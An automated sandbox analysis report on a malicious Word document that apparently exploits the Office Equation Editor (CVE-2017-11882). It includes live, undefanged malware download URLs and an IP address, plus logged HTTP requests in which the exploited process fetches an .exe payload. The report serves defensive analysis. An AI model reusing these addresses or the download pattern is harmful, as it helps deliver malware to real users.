Play interactive tour

Edit tour

Analysis Report PO-21004-1-Ind Expert.doc

Overview

General Information

Sample Name:	PO-21004-1-Ind Expert.doc
Analysis ID:	350778
MD5:	e15b6be79b819eea3f6f52d7a5a209a1
SHA1:	ef521215f61121ab8a9ea2672a4350d8860cc79a
SHA256:	1256ae8e8b9e0a3aaa68b4d883f404de4cb55208aabef010c04231b1a1e11edf
Tags:	doc
Most interesting Screenshot:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2420 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2544 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

EQNEDT32.EXE (PID: 2880 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 43.252.37.193, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2544, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.globalteamacademy.com/showcase/fig/CFHhMaweBF1QHvO.exe	Avira URL Cloud: Label: malware
Source: http://globalteamacademy.com/showcase/fig/CFHhMaweBF1QHvO.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: PO-21004-1-Ind Expert.doc	Virustotal: Detection: 45%			Perma Link
Source: PO-21004-1-Ind Expert.doc	ReversingLabs: Detection: 48%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: globalteamacademy.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 43.252.37.193:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 43.252.37.193:80

Networking:

Source: Joe Sandbox View

IP Address: 43.252.37.193 43.252.37.193

Source: Joe Sandbox View

ASN Name: NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud

Source: global traffic	HTTP traffic detected: GET /showcase/fig/CFHhMaweBF1QHvO.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /showcase/fig/CFHhMaweBF1QHvO.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.globalteamacademy.com

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6894AC4A-6F93-4194-97B0-E6749671AC21}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /showcase/fig/CFHhMaweBF1QHvO.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /showcase/fig/CFHhMaweBF1QHvO.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.globalteamacademy.com

Source: unknown

DNS traffic detected: queries for: globalteamacademy.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Feb 2021 19:34:05 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.globalteamacademy.com/wp-json/>; rel="https://api.w.org/"Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 32 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73

System Summary:

Source: classification engine

Classification label: mal68.expl.winDOC@4/6@3/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$-21004-1-Ind Expert.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD70D.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PO-21004-1-Ind Expert.doc	Virustotal: Detection: 45%
Source: PO-21004-1-Ind Expert.doc	ReversingLabs: Detection: 48%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2528	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2992	Thread sleep time: -120000s >= -30000s			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	Virtualization/Sandbox Evasion1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	System Information Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO-21004-1-Ind Expert.doc	45%	Virustotal		Browse
PO-21004-1-Ind Expert.doc	49%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.globalteamacademy.com/showcase/fig/CFHhMaweBF1QHvO.exe	100%	Avira URL Cloud	malware
http://globalteamacademy.com/showcase/fig/CFHhMaweBF1QHvO.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
globalteamacademy.com	43.252.37.193	true	true		unknown
www.globalteamacademy.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.globalteamacademy.com/showcase/fig/CFHhMaweBF1QHvO.exe	true	Avira URL Cloud: malware	unknown
http://globalteamacademy.com/showcase/fig/CFHhMaweBF1QHvO.exe	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.252.37.193	unknown	Malaysia		45144	NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	350778
Start date:	09.02.2021
Start time:	20:33:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO-21004-1-Ind Expert.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.expl.winDOC@4/6@3/1
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe

Simulations

Behavior and APIs

Time	Type	Description
20:33:41	API Interceptor	279x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
43.252.37.193	PAYMENT DETAILS .doc	Get hash	malicious	Browse	www.globalteamacademy.com/cafex/okb/upJIyDviCIIQ252.exe
	Revised Purchase Order 1214.doc	Get hash	malicious	Browse	globalteamacademy.com/showcase/pal/TrC86HH4pxVZ49N.exe
	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	globalteamacademy.com/showcase/bill/6vWjC1g7qA0Z76f.exe
	Request- NAVALTECH.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/zic/KlalU0GjxacVNEE.exe
	Quotation-20441.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exe
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe
	New ORDER 092134..doc	Get hash	malicious	Browse	globalteamacademy.com/docct/dj/fBqZ0SFcHFfoBIY.exe
	RFQ A50924-E001.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/zi/SAM.exe
	quotation085312456.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/pll/PALLS.exe
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/ja/JASP.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
globalteamacademy.com	Revised Purchase Order 1214.doc	Get hash	malicious	Browse	43.252.37.193
	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	43.252.37.193
	Request- NAVALTECH.doc	Get hash	malicious	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	43.252.37.193
	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	PAYMENT DETAILS .doc	Get hash	malicious	Browse	43.252.37.193
	Revised Purchase Order 1214.doc	Get hash	malicious	Browse	43.252.37.193
	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	43.252.37.193
	Request- NAVALTECH.doc	Get hash	malicious	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	43.252.37.193
	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193
	PAYMENT 25SW Aug-06-2018.doc	Get hash	malicious	Browse	182.239.42.250

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6894AC4A-6F93-4194-97B0-E6749671AC21}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E42C9A4D-C73B-45F3-859A-E103BFD96442}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.9300745020195451
Encrypted:	false
SSDEEP:	6:/ZlHklwwNgREqAWlgFJkSDlll8vlwrVh/FwQFrB:/Zeldk5uFJn7uvqz/KQZB
MD5:	F22AD48F1F04698994929A02C62A1F47
SHA1:	DCAA975B29DE96698AEC45A7C9A03EE758A68E97
SHA-256:	91CC975C4E868CC7C8B6262BA56A44393EAA79887E5BC93EA3B260808932F249
SHA-512:	19889D5C24FA481F2E27F4D30EDC69FAEC576E1909AF00AAF13EFA0C70DD6A299AA1C0FB5873392D806F6EA29F132977B12BA59A69C8481A3D225A399A244A02
Malicious:	false
Reputation:	low
Preview:	_.5.8.1.1.9.7.4.7.9.2.5.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...............................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j%p.c...CJ..OJ..QJ..U..^J..aJ.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO-21004-1-Ind Expert.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Feb 10 03:33:39 2021, length=657778, window=hide
Category:	dropped
Size (bytes):	2138
Entropy (8bit):	4.556518931360719
Encrypted:	false
SSDEEP:	48:8I/XT0jFUlnhvNQFQh2I/XT0jFUlnhvNQFQ/:8I/XojFU5QFQh2I/XojFU5QFQ/
MD5:	DC4D888B785E9600C70D7BD7D6F6E2B1
SHA1:	657884B8879A937FF57AC99A9D45D413F163F7E9
SHA-256:	26C16684917DBB18E54133B3F934A0B57A2FDD745FB1BF544A57EAC7B00A3716
SHA-512:	0A8384CF806894B734F6EBEEF1211117C03181223B448AB36DFDF9E991A38E746398B764ED0B53EB217FD7FE0D3CA7197966B91EB5A425F0A64FE25CF7E5A53C
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...<f...{..<f...{..D2\|.e...r............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\|.2.r...JR4$ .PO-210~1.DOC..`.......Q.y.Q.y...8.....................P.O.-.2.1.0.0.4.-.1.-.I.n.d. .E.x.p.e.r.t...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\648351\Users.user\Desktop\PO-21004-1-Ind Expert.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.-.2.1.0.0.4.-.1.-.I.n.d. 